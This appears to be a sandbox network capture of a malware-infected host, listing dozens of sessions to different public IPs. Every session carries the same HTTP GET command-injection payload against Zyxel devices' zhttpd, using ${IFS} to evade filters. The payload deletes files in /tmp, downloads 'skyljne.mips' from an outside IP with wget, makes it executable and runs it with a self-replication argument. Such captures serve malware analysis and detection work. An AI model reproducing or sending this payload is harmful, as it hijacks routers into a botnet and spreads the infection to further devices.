                                                Jan 12, 2024 18:16:15.259974003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2566192.168.2.235942260.60.111.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.260011911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2567192.168.2.235516852.113.215.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.260063887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2568192.168.2.235894083.154.42.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.260113001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2569192.168.2.235071048.181.122.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.260135889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2570192.168.2.2349050194.189.255.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.260183096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2571192.168.2.2350884102.40.154.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.260248899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2572192.168.2.234948274.98.61.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.260278940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2573192.168.2.2336488167.120.251.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.260317087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2574192.168.2.2334676186.28.190.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.260356903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2575192.168.2.2349268138.17.86.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.260386944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2576192.168.2.2343534144.164.211.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.260421991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2577192.168.2.2340934167.52.100.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.260473013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2578192.168.2.234885257.6.0.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.260509014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2579192.168.2.2346126115.184.92.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.260556936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2580192.168.2.2357764154.113.97.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.260596991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2581192.168.2.2339768191.108.161.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.260647058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2582192.168.2.2336116130.90.134.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.260693073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2583192.168.2.235573434.72.85.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.260741949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2584192.168.2.2350570165.98.39.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.260771036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2585192.168.2.236045847.91.90.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.260802984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2586192.168.2.233560084.213.128.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.260863066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2587192.168.2.2335826188.16.122.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.260919094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2588192.168.2.235218264.118.197.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.260953903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2589192.168.2.2349096165.97.156.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.260987997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2590192.168.2.23398861.223.84.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.261043072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2591192.168.2.2359616141.18.117.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.261085987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2592192.168.2.235116870.163.56.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.261113882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2593192.168.2.235157086.149.64.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.261146069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2594192.168.2.233978853.11.53.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.261190891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2595192.168.2.2352574119.54.112.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.261231899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2596192.168.2.235976037.199.135.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.261281013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2597192.168.2.234689427.140.14.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.261321068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2598192.168.2.2349380168.84.3.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.261358023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2599192.168.2.2352110183.57.143.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.261379004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2600192.168.2.2354792183.169.27.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.261409998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2601192.168.2.234566845.81.166.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.261460066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2602192.168.2.234135853.138.167.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.261496067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2603192.168.2.2345094199.35.138.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.261509895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2604192.168.2.2339918130.97.54.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.261547089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2605192.168.2.2359850100.5.147.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.261589050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2606192.168.2.234363477.207.203.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.261636019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2607192.168.2.23443144.201.121.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.261672020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2608192.168.2.2357698105.34.82.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.261708975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2609192.168.2.2357058102.1.223.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.261748075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2610192.168.2.2342076113.147.178.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.261782885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2611192.168.2.235556483.142.20.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.261797905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2612192.168.2.235342258.50.250.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.261862993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2613192.168.2.2335264113.198.22.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.261897087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2614192.168.2.2336534134.239.42.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.261935949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2615192.168.2.2353542130.131.194.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.261974096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2616192.168.2.235409284.84.5.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.265626907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2617192.168.2.235202498.65.118.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.265682936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2618192.168.2.233494851.48.13.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:15.265743971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2619192.168.2.233563283.127.49.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.275048971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2620192.168.2.234658234.21.245.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.275094032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2621192.168.2.2338498163.177.8.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.275129080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2622192.168.2.235940843.225.248.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.275154114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2623192.168.2.2360744125.105.143.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.275193930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2624192.168.2.23369624.7.62.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.275248051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2625192.168.2.2333390188.133.150.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.275274992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2626192.168.2.2339666176.249.184.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.275316954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2627192.168.2.23422481.63.88.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:16.275358915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2628192.168.2.2335890111.3.193.201443
                                                TimestampBytes transferredDirectionData
